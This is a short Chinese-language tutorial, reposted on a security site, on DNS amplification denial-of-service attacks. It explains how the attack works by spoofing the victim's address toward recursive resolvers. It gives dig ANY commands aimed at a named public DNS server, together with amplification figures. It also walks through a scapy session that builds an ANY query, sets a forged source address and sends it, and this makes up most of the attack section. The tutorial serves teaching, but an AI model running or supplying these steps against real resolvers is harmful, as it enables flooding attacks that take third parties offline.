拒绝服务——DNS 放大攻击

admin 2022年11月7日21:45:03安全百科评论5 views1035字阅读3分27秒阅读模式



拒绝服务——DNS 放大攻击


前言

本节学习DNS 放大攻击
基于UDP

1、简介

DNS 放大攻击

  • 基于UDP

  • 产生大流量的攻击方法

  • 单机的带宽优势

  • 巨大单机数量形成的流量汇聚

  • 利用协议特性实现放大效果的流量

DNS协议放大效果

  • 查询请求流量小,但响应流量可能非常巨大

  • 形如

dig ANY hp.com @202.106.0.20 #流量放大约8倍

攻击原理

  • 伪造源地址为被攻击目标地址,向大量递归域名查询服务器发起查询

  • DNS服务器成为流量放大和实施攻击者,大量DNS服务器实现DDOS

2、尝试攻击

dig any baidu.com @202.106.0.20 #进行攻击#发送60字节长度,返回216字节长度

scapy构造数据包

scapy>>> i=IP() #构造 IP 数据包>>> i.display()>>> i.dst="202.106.0.20">>> i.display()>>> u=UDP() #构造 UDP 数据包>>> u.display()>>> d=DNS() #构造 DNS 数据包>>> d.display()>>> d.rd=1>>> d.qdcount=1>>> d.display()>>> q=DNSQR() #设置查询目标>>> q.display()>>> q.qname='qq.com'>>> q.qtype=255   #(代表any)>>> d.qd=q   # 设置目标>>> d.display()>>> r=(i/u/d) #拼接数据包>>> r >>> r.display()>>> sr1(r)>>> i.src="192.168.1.110">>> r=(i/u/d)>>> r.display()>>> send(r) #发送数据包#发送30字节,回210字节

结语

理解如何将DNS服务器变为帮凶

可参考
https://blog.csdn.net/easylife206/article/details/95560965
https://blog.csdn.net/chenfei_5201213/article/details/7548381




   红客突击队于2019年由队长k龙牵头,联合国内多位顶尖高校研究生成立。团队从成立至今多次参加国际网络安全竞赛并取得良好成绩,积累了丰富的竞赛经验。红客突击队始终秉承先做人后技术的宗旨,旨在打造国际顶尖网络安全团队。其核心团队于2022年转型于信息安全研究院,并为政企提供安全服务与技术支持。


© Honker Security Commando


原文始发于微信公众号(中龙 红客突击队):拒绝服务——DNS 放大攻击

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年11月7日21:45:03
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  拒绝服务——DNS 放大攻击 http://cn-sec.com/archives/1395792.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: